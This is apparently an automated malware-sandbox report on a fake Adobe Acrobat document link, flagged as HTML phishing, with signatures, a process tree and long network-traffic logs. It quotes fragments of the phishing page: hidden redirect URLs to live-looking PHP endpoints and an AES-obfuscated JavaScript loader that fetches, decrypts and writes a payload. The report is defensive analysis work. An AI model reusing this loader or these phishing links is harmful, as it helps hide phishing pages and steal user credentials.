Edit tour

Windows Analysis Report
https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12

Overview

General Information

Sample URL:	https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12
Analysis ID:	1486095
Infos:

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish70

HTML page contains hidden URLs

HTML page contains suspicious javascript code

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Detected non-DNS traffic on DNS port

Drops files with a non-matching file extension (content does not match file extension)

Form action URLs do not match main URL

Found iframes

HTML body contains low number of good links

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTML page contains string obfuscation

HTML title does not match URL

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 2300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1920,i,8986662777520531306,16953226283014811708,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 3224 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2332 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6360 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2756 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6740 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 528 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7448 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_917	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security
dropped/chromecache_917	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish70

Source: Yara match

File source: dropped/chromecache_917, type: DROPPED

HTML page contains hidden URLs

Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: https://caodai-tttn.bir.ru///3684.php
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: https://caodai-tttn.bir.ru///4895.php

HTML page contains suspicious javascript code

Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: window.location.href = atob(
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: window.location.href = atob(

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: async function quaintness(abbot) { <!-- <span>the road is an endless adventure waiting to be driven.</span> --> var {a,b,c,d} = json.parse(abbot); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function jackpot() {abase.hidden = 0;xenophobe.hidden = 1; document.write(await quaintness(await (await fetch(await quaintness(atob(`eyjhijoimhcxdlvbnev1zmlma3jhuzjcl0npxc9cukl3t0xvvzjfegjzem5tqxfgnm1bpsisimmioijlmdgyzjg4yji1mtk0owy2ytzmzwq1mdnjzjqwmmzlncisimiioijhy2vlzdyzyzmxmdviyzljmdq5y2m2yzbjztg5mji2mge0ngjiyjvhnwm0otjkoguxoty0mtqznwy3zjjmnjg2yjdhzjq5zjq2mtlkm2flzde5ngzimtk0yzrizmqyogjkzmu2ywy4oty3mwnmzdk1yjnhzweynjfkzgnmmgmyy2nizmfmnwrknwqyowiwn2mxzjjhnwvlztq1y2u2ytqxn2uwogizzjm2mzfizwvimzzhymeymmy0yty0mzeznzywmdllnjhlmgjiyzm0njazndiwmzhhnme3mwmxztrhm2u1zwjhzmzhymiyn2ywy2e3zwq5njdjody1n...
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: async function quaintness(abbot) { <!-- <span>the road is an endless adventure waiting to be driven.</span> --> var {a,b,c,d} = json.parse(abbot); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function jackpot() {abase.hidden = 0;xenophobe.hidden = 1; document.write(await quaintness(await (await fetch(await quaintness(atob(`eyjhijoimhcxdlvbnev1zmlma3jhuzjcl0npxc9cukl3t0xvvzjfegjzem5tqxfgnm1bpsisimmioijlmdgyzjg4yji1mtk0owy2ytzmzwq1mdnjzjqwmmzlncisimiioijhy2vlzdyzyzmxmdviyzljmdq5y2m2yzbjztg5mji2mge0ngjiyjvhnwm0otjkoguxoty0mtqznwy3zjjmnjg2yjdhzjq5zjq2mtlkm2flzde5ngzimtk0yzrizmqyogjkzmu2ywy4oty3mwnmzdk1yjnhzweynjfkzgnmmgmyy2nizmfmnwrknwqyowiwn2mxzjjhnwvlztq1y2u2ytqxn2uwogizzjm2mzfizwvimzzhymeymmy0yty0mzeznzywmdllnjhlmgjiyzm0njazndiwmzhhnme3mwmxztrhm2u1zwjhzmzhymiyn2ywy2e3zwq5njdjody1n...

Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12

HTTP Parser: Form action: https://ims-na1.adobelogin.com/ims/authorize/v1 adobe adobelogin

Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12

HTTP Parser: Iframe src: https://acrobat.adobe.com/dcpreviewdropin/3.0.2_2.875.0/printHelper.html

Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12	HTTP Parser: Number of links: 1
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: Number of links: 0
Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: Number of links: 0

Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: Total embedded image size: 45708
Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: Total embedded image size: 45708

Source: https://dscoco.com/findattacheddocument/secure.html

HTTP Parser: Base64 decoded: {"a":"0w1vUA4EufifkrGS2\/Ci\/BRIwOLoW2ExbsznSAqF6mA=","c":"e082f88b251949f6a6fed503cf402fe4","b":"aceed63c3105bc9c049cc6c0ce892260a44bbb5a5c492d8e19641435f7f2f686b7af49f4619d3aed194fb194c4bfd28bdfe6af89671cfd95b3aea261ddcf0c2ccbfaf5dd5d29b07c1f2a5eee45ce6...

Source: https://acrobat.adobe.com/dc-conversions2-dropin/3.17.1_2.119.0/translations-en-US-json.js

HTTP Parser: Found new string: script "use strict";(self["webpackJsonp-conversions2"]=self["webpackJsonp-conversions2"]||[]).push([[818],{R5i5:e=>{e.exports=JSON.parse('{"pdfti.dropzone.heading.seo":"Convert a PDF to JPG image","pdftw.dropzone.heading.seo":"Convert PDF to Word","pdftxls.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft Excel converter.","pdftxls.dropzone.heading.seo":"Convert PDF to Excel","pdftw.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft Word converter.","pdftppt.dropzone.heading.seo":"Convert PDF to PPT","pdftppt.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft PowerPoint (PPT) converter.","pdftw.dropzone.description.mobile.seo":"Select a PDF file to use our PDF to Microsoft Word converter.","pdfti.dropzone.description.mobile.seo":"Select a PDF, then convert to JPG, PNG, or TIFF file formats.","pdftxls.dropzone.description.mobile.seo":"Select a PDF file to use our PDF to Microsoft Excel converter.","pdftppt.dropzone.description.mob...

Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: Title: pagination does not match URL
Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: Title: zydeco does not match URL

Source: https://acrobat.adobe.com/dcpreviewdropin/3.0.2_2.875.0/printHelper.html	HTTP Parser: No favicon
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: No favicon
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: No favicon
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: No favicon
Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: No favicon

Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12	HTTP Parser: No <meta name="author".. found
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: No <meta name="author".. found
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: No <meta name="author".. found
Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: No <meta name="author".. found

Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12	HTTP Parser: No <meta name="copyright".. found
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: No <meta name="copyright".. found
Source: https://dscoco.com/findattacheddocument/secure.html	HTTP Parser: No <meta name="copyright".. found
Source: https://dscoco.com/findattacheddocument/secure.html#	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:56931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:56934 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56949 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56835 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: adobe.tt.omtrdc.net
Source: global traffic	DNS traffic detected: DNS query: widget.uservoice.com
Source: global traffic	DNS traffic detected: DNS query: use.typekit.net
Source: global traffic	DNS traffic detected: DNS query: static.adobelogin.com
Source: global traffic	DNS traffic detected: DNS query: prod.adobeccstatic.com
Source: global traffic	DNS traffic detected: DNS query: p.typekit.net
Source: global traffic	DNS traffic detected: DNS query: l.betrad.com
Source: global traffic	DNS traffic detected: DNS query: ims-na1.adobelogin.com
Source: global traffic	DNS traffic detected: DNS query: files-download2.acrocomcontent.com
Source: global traffic	DNS traffic detected: DNS query: dc-api-v2.adobecontent.io
Source: global traffic	DNS traffic detected: DNS query: dc-api.adobecontent.io
Source: global traffic	DNS traffic detected: DNS query: c.evidon.com
Source: global traffic	DNS traffic detected: DNS query: by2.uservoice.com
Source: global traffic	DNS traffic detected: DNS query: assets.adobedtm.com
Source: global traffic	DNS traffic detected: DNS query: api.echosign.com
Source: global traffic	DNS traffic detected: DNS query: cdn-sharing.adobecc.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: o4505393339695104.ingest.us.sentry.io
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: detect.adobedccdn.com
Source: global traffic	DNS traffic detected: DNS query: _19292._https.detect.adobedccdn.com
Source: global traffic	DNS traffic detected: DNS query: _39691._https.detect.adobedccdn.com
Source: global traffic	DNS traffic detected: DNS query: _49100._https.detect.adobedccdn.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 57055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57009
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56951
Source: unknown	Network traffic detected: HTTP traffic on port 56973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 57117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57019
Source: unknown	Network traffic detected: HTTP traffic on port 57095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57021
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 56949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57029
Source: unknown	Network traffic detected: HTTP traffic on port 57048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57039
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56992
Source: unknown	Network traffic detected: HTTP traffic on port 57020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57048
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 57003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 56943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 57080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
